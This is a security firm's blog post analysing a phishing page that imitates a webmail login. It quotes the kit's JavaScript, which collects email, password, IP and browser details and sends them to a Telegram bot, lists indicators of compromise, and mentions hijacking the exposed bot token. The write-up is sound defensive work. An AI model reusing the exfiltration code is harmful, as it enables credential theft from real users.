2025 has just begun, and scammers aren’t taking any breaks. Earlier today, a new phishing campaign landed in our support ticketing inbox. At first glance, we assumed it was a continuation of the Zhong Stealer campaign—but this one was different.

“Account suspension notification”, read the ticket, sent by someone impersonating one of our admins. Despite the absurd claim—and the equally absurd method of delivering it—we immediately began investigating.

The Phisher Muppet

Our scammer used a website hosted on Google Appspot that posed as a login form.

A quick look at the URL revealed that we could manipulate it to modify the form and tailor it for other potential victims. Parsing arguments from an URL? That’s a muppet way to do things.

This behaviour is led by this small code snippet, which extracts the domain (everything after the “@” symbol) and displays it as the company the form supposedly belongs to:

var ind = my_ai. indexOf ("@");
var m_slic = my_ai. substr((ind + 1)) ;
var c = m_slic.substr(0, m_slic.index0f('.'));
var fnll = c. toLowerCase();
var fllu = c. toUpperCase();
var browser = GetBrowserandLanguage () [0];

Resorting to client-side code like JavaScript to reflect content on a phishing page? That sounds like a muppet move. This is a clear indicator of inexperience, so let’s take a closer look at the rest of the code—there’s a good chance we’ll uncover more clues.

var f = "bmV4dC5waHA=";
$( '#sub_btn'). click(function (event) {
  $( '#errror').hide();
  [...]

“next.php” encoded in Base64. Let’s see what’s next:

var message = "-+ General Webmail ReZulT +=\n";
message += "Email: " + ai + "\n"; 
message += "Password: " + pr + "\n";
message += "Browser : " + GetBrowserandLanguage () [0] + "\n";
message += "Language: " + GetBrowserandLanguage () [1] + "\n"; 
message += "MX Record: " + await getMXRecord (domain) + "\n"; 
message += "IP Address : " + ip + "\n"; message += "Date: " + date + "\n";
message += "—-+ General Webmail ReZulT +---\n";
var token = "73[REDACTED]rI";
var chatId = "1[REDACTED]6";
dataType: 'JSON', rl: 'https://api.telegram.org/bot${token}/sendMessage,
type: 'POST',
data: {
[...]

So, our Threat Stuntman (he clearly isn’t quite an actor) left a plaintext Telegram Bot Token and a Telegram Chat ID in the code.

Base64 encoded strings, client-side tokens, “ReZulT” l33t speaking, URL based constructions…

Let’s see what happens in the backstage.

Muppet Pest Control (A subsidiary of Threat Punchers INC)

At the backstage, the Muppet will fetch our IP address information from ipinfo.io, classic move.

Then, will try to resolve the MX DNS record using Google’s services.

Next, all gathered information including credentials are sent via Telegram Message, once again exposing the Bot Token and the Chat ID.

Now if we were bad people (and we are not) we could have just grabbed the Bot Token and start spamming content on its behalf. By modifying the text parameter, we can literally send anything under the Bot’s name.

Now, if we were really bad people (again, we are not), we could just change the chat_id parameter also, and start spamming anyone with any content under the Bot’s name.

Let’s try to find out this Bot’s handler and who is it relying information to. We can do so with Telegram’s API.

And there it is—our Muppet and the puppeteer behind it.

Now comes our favourite part: the flamethrower. Let’s burn down their accounts, starting with reports to their providers, followed by our Brand Protection solutions to speed up the process and keep the issue under control.

Another day, another burnt phishing infra. Now we can freely enjoy the rest of our Friday.

Thanks for reading, and don’t go on a fishing trip without your muppet repellent.

IOCs

URL:https://firebasestorage.googleapis[.]com/v0/b/aloneatprom-
7fde1.appspot.com/o/gb%2Funiversal.html?alt=media&token=93f4ac80-4eae-4cd1-8b68-294631c8c821#ayuda@bitso.com)
TelegramBot:@Slimkudibot